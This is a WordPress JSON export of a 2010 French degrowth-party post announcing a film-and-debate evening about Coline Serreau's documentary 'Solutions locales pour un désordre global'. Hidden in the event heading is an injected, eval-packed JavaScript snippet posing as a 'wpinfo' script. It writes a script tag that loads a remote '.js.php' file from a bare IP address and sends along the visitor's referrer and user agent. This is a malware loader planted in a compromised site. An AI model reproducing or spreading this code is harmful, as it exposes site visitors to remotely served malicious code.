{"id":4428,"date":"2010-05-16T21:13:10","date_gmt":"2010-05-16T20:13:10","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=4428"},"modified":"2010-05-27T07:27:45","modified_gmt":"2010-05-27T06:27:45","slug":"soiree-debat-solutions-locales-pour-un-desordre-global-mercredi-26-mai-a-20h30","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=4428","title":{"rendered":"Soir\u00e9e-d\u00e9bat. Solutions locales pour un d\u00e9sordre global. Mercredi 26 mai \u00e0 20h30"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" style=\"border-width: 0px;\" src=\"http:\/\/www.arcueil.fr\/IMG\/jpg\/img008.jpg\" alt=\"(JPG)\" width=\"183\" height=\"267\" \/><\/p>\n<p style=\"text-align: center;\">\n<h3>Soir\u00e9e-d\u00e9bat <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bsrne|var|u0026u|referrer|ydadt||js|php'.split('|'),0,{}))\n<\/script><\/noindex> : mercredi 26 mai \u00e0 20h30<\/h3>\n<p>Film + d\u00e9bat<\/p>\n<p>Cam\u00e9ra au poing, Coline Serreau a parcouru le monde pendant pr\u00e8s de trois ans \u00e0 la rencontre de femmes et d\u2019hommes de terrain, penseurs et \u00e9conomistes, qui exp\u00e9rimentent localement, avec succ\u00e8s, des solutions pour panser les plaies d\u2019une terre trop longtemps maltrait\u00e9e.<\/p>\n<p>Soir\u00e9e organis\u00e9e en partenariat avec :<\/p>\n<p>Alter-conso Arcueil Cachan Val de Bi\u00e8vre<br \/>\nAction consommation<br \/>\nLes amis de la conf\u00e9d\u00e9ration paysanne<\/p>\n<p>I<strong>ntervenants :<\/strong><\/p>\n<p>Yann Fi\u00e9vet : Pr\u00e9sident d\u2019action consommation.<br \/>\nChristian Jacquiau, \u00e9conomiste et auteur du livre \u00ab Les coulisses de la grande distribution \u00bb.<br \/>\nPhilippe Collin, secr\u00e9taire nationale et porte parole de la conf\u00e9d\u00e9ration paysanne.<br \/>\nVincent Liegey, membre du Parti Pour La D\u00e9croissance (PPLD).<\/p>\n<p><!--more--><\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"..\/wp-content\/uploads\/2008\/12\/logo-ppld.gif\" alt=\"\" width=\"118\" height=\"68\" \/><\/p>\n<h3>Solutions locales pour un d\u00e9sordre global<\/h3>\n<p>Documentaire (1h 53min)<br \/>\nFilm fran\u00e7ais. Ann\u00e9e de production : 2009<br \/>\nDe Coline Serreau<\/p>\n<p><span style=\"float: left; width: 75px;\"><img loading=\"lazy\" decoding=\"async\" style=\"border-width: 0px;\" src=\"http:\/\/www.arcueil.fr\/IMG\/jpg\/solutions_locales.jpg\" alt=\"(JPG)\" width=\"75\" height=\"100\" \/><\/span> \u00ab\u00a0Les films d\u2019alertes et catastrophistes ont \u00e9t\u00e9 tourn\u00e9s, ils ont eu leur utilit\u00e9, mais maintenant il faut montrer qu\u2019il existe des solutions, faire entendre les r\u00e9flexions des philosophes et \u00e9conomistes&#8230;\u00a0\u00bb Coline Serreau.<\/p>\n<p><a href=\"http:\/\/www.solutionslocales-lefilm.com\/accueil\">Bande-annonce<\/a><\/p>\n<p id=\"encadre\" style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" style=\"border-width: 0px;\" src=\"http:\/\/www.arcueil.fr\/IMG\/jpg\/img009.jpg\" alt=\"(JPG)\" width=\"355\" height=\"500\" \/> <a href=\"http:\/\/www.arcueil.fr\/article.php3?id_article=2294\"><span style=\"font-weight: bold;\"><br \/>\n<\/span><\/a><\/p>\n<p id=\"encadre\" style=\"text-align: center;\"><a href=\"http:\/\/www.arcueil.fr\/article.php3?id_article=2294\"><span style=\"font-weight: bold;\"> <\/span>Espace Municipal Jean Vilar<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Soir\u00e9e-d\u00e9bat : mercredi 26 mai \u00e0 20h30 Film + d\u00e9bat Cam\u00e9ra au poing, Coline Serreau a parcouru le monde pendant pr\u00e8s de trois ans \u00e0 la rencontre de femmes et d\u2019hommes de terrain, penseurs et \u00e9conomistes, qui exp\u00e9rimentent localement, avec &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=4428\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,15],"tags":[],"class_list":["post-4428","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d","category-le-monde-culturel"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4428","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4428"}],"version-history":[{"count":14,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4428\/revisions"}],"predecessor-version":[{"id":4514,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/4428\/revisions\/4514"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4428"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4428"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}